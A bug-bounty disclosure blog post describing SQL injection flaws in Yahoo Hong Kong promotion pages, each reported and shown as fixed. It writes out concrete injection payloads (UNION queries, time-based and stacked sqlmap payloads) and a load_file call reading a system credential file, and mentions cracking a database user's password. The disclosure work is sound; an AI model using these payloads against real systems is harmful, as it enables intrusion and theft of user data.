Yahoo SQL Injection!

Hello everyone,

After my LFI and RCE reports I decided to focus on another type of attack. After reading Jordan Milne’s report on HK promotions, he pointed “It’s a good place to look because it has lots of PHP scripts and Flash, it looks like it wasn’t done by Yahoo’s core devs, and most auditors aren’t looking there since its content is mostly in Chinese”. Indeed! So I decided to expand on these domains and started to poke around the following URL and was able to make 5 different reports with 8 vulnerable files.

Emotive2012

hk.promotions.yahoo.com/emotive2012/hkdesignyear/pplchoice_gallerydetails.html?i=123

I realized that the ‘i’ parameter 124-1 is still showing the content value of 123. So with a sample “132+ORDER+BY+4” I was able to guess the table numbers with the first try and was able to simply get the following information:

Version&DBNow I wanted to see if I have the capability to do more so first I decided to try and load /etc/passwd by doing the following:

hk.promotions.yahoo.com/emotive2012/hkdesignyear/pplchoice_gallerydetails.html?i=-123+UNION+SELECT+1,2,load_file(CHAR(46, 46, 47, 46, 46, 47, 46, 46, 47, 46, 46, 47, 46, 46, 47, 46, 46, 47, 46, 46, 47, 46, 46, 47, 46, 46, 47, 46, 46, 47, 101, 116, 99, 47, 115, 104, 97, 100, 111, 119)),4

But no luck there. However I was able to access the MYSQL database and its tables including mysql.user:

YahooRoot

The root password wasn’t crackable BUT I was able to find a user  with the similar privileges and the password was easily cracked in a few moments (also mentioned in my report on hackerone to Yahoo to change the passwords).

Timeline:
03/10/2014 – Initial Report
03/14/2014 – Triagged
04/07/2014 – Fixed

Nikon Photo Itinerary

I was also able to report a few more SQLis on the following domains:

http://hk.promotions.yahoo.com/travel/nikon_photoitinerary/view_albumDetails.html?album=123

dbanduser

Timeline:
03/12/2014 – Initial Report
03/14/2014 – Triagged
04/06/2014 – Fixed

After reading a few source files and analyzing the website more I came across the following  file in the same folder which was also vulnerable to the same attack.

/ajax/idv_data.php?album_id=SQL INJECTION

The above databases contained information such as user email address, address, phone numbers and etc but no actual data was dumped from the databases.

Timeline:
03/15/2014 – Initial Report
03/20/2014 – Triagged
04/06/2014 – Fixed

Out of Scope SQL Injections

As for the other remaining 2 vulnerable files (which were out of scope and reported anyways); I reported an SQLi via Post method Which I was able to produce a valid PoC via SQLMAP using the following payload:

Place: POST
Parameter: cid
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: cid=2396 AND 6238=6238

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: cid=2396 AND SLEEP(5)

And It’s still in the process of being patched (So I will not be disclosing the URL publicaly) And the last SQLi, which is out of scope and was initially my first SQLi report to Yahoo, consists of 3 different vulnerable files:

http://hk.promotion.yahoo.net/education/api/get_video_poll.php?poll_id=9805

Type: UNION query
Title: MySQL UNION query (NULL) - 8 columns
Payload: poll_id=9805 UNION ALL SELECT NULL,CONCAT(0x716d627571,0x596e52534e                                                                 4d61795843,0x71796a7171),NULL,NULL,NULL,NULL,NULL,NULL#

Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: poll_id=9805; SELECT SLEEP(5)--

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: poll_id=9805 AND SLEEP(5)

http://hk.promotion.yahoo.net/education/api/get_video_poll_choice.php?poll_id=9805

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: poll_id=9805 AND SLEEP(10)

http://hk.promotion.yahoo.net/education/api/get_video_poll_result.php?poll_id=9805

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: poll_id=9805 AND SLEEP(10)

Timeline:
03/04/2014 – Initial Report
03/05/2014 – Triagged
03/15/2014 – Fixed

 I was way too excited to report this vulnerability, therefor I didn’t bother to see if I could do more than just SLEEP(10) and didn’t try to explore more options such as accessing mysql.user or using the read_file function.
Maybe next time!

Conclusion:

As a result of these SQL Injection’s I was able to place myself in Yahoo’s top 5 “hackers”  on Hakcerone!
top
I would like to thank Stefano Vettorazzi for pointing out one of my mistakes while I was stuck and trying to exploit one of the above SQLi’s.

Thanks for reading!

This post has been viewed [post_view] times

Post a comment

You may use the following HTML:
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>